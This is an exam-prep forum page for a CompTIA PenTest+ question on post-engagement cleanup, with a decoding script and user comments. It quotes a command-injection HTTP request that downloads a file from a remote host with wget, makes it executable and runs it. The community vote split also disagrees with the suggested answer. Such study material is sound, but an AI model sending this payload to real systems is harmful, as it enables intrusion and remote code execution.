Exam PT1-002 topic 1 question 25 discussion

Actual exam question from CompTIA's PT1-002
Question #: 25
Topic #: 1

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"

Which of the following commands should the penetration tester run post-engagement?

  • A. grep -v apache ~/.bash_history > ~/.bash_history
  • B. rm -rf /tmp/apache
  • C. chmod 600 /tmp/apache
  • D. taskkill /IM "apache" /F
Suggested Answer: B
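
As an added example (not part of the original question or the site's material), this Python sketch decodes the request target from the question and lists the files its injected shell commands would leave on disk, which is what post-engagement cleanup or an incident responder reviewing web logs has to account for. The function names and the benign second sample are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed samples: the request target from the question, and a benign login.
SAMPLE_TARGETS = [
    "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;"
    "${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;"
    "${IFS}./apache'%0A%27&loginUser=a&Pwd=a",
    "/cgi-bin/index.cgi?action=login&Path=/home&loginUser=a&Pwd=a",
]

IFS_TOKEN = re.compile(r"\$\{IFS\}")  # the shell expands ${IFS} to whitespace


def decode_params(target):
    """Percent-decode each query parameter and expand ${IFS} to a space."""
    query = target.partition("?")[2]
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[key] = IFS_TOKEN.sub(" ", unquote(value))
    return params


def dropped_files(target):
    """List files that wget commands injected into a parameter would write."""
    found = []
    for value in decode_params(target).values():
        if "\n" not in value and ";" not in value:
            continue  # no command separator, nothing injected
        cwd = "/"  # assumption: start directory unknown, shown as /
        for command in re.split(r"[;\n]", value):
            words = [w.strip("'\"") for w in command.split()]
            words = [w for w in words if w]
            if "cd" in words[:-1]:
                cwd = words[words.index("cd") + 1]
            if words and words[0] == "wget":
                # assumption: no -O option, so wget saves under the URL basename
                name = posixpath.basename(urlsplit(words[-1]).path) or "index.html"
                found.append(posixpath.join(cwd, name))
    return found


if __name__ == "__main__":
    for sample in SAMPLE_TARGETS:
        print(dropped_files(sample))
```

For the question's request the only path reported is /tmp/apache, the file that answer B removes.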

Comments

BinarySoldier
Highly Voted 3 years, 5 months ago
The apache folder in tmp was added by the tester, therefore, it's right for him to clean it up. B is the right answer.
upvoted 9 times
...
bieecop
Most Recent 1 year, 10 months ago
Selected Answer: B
The command rm -rf /tmp/apache is used to remove the file named "apache" located in the "/tmp" directory. This command ensures the removal of the potentially malicious file that was downloaded to the system during the exploitation process. By removing the file, the tester helps eliminate any potential lingering artifacts or backdoors left on the system.
upvoted 2 times
...
kenechi
2 years, 2 months ago
Selected Answer: B
The apache file was downloaded using the wget and the permission was changed to 777 for all to execute the file. It was executed using the ./apache after it was made executable. It is proper to remove the executable in the /tmp directory.
upvoted 3 times
...
TheITStudent
2 years, 9 months ago
Selected Answer: C
All I know is mkdir is the standard command for creating a directory folder, and I DO NOT SEE that here, so we don't have any indication that this folder was created, only that its permissions were changed from 600 to 777... I think post assessment cleanup should involve resetting the configurations to how you found them.
upvoted 3 times
...
rootlikegroot
2 years, 10 months ago
The most important thing before deleting the /tmp/apache directory is to change the permissions from 777 to 600.
upvoted 1 times
isaphiltrick
1 year, 8 months ago
I don't understand this logic--why would you need to change the permissions if you were going to delete it anyway? Answer is B, just delete it.
upvoted 1 times
...
...
DohJayVeh
3 years, 7 months ago
This force deletes everything in that folder
upvoted 1 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other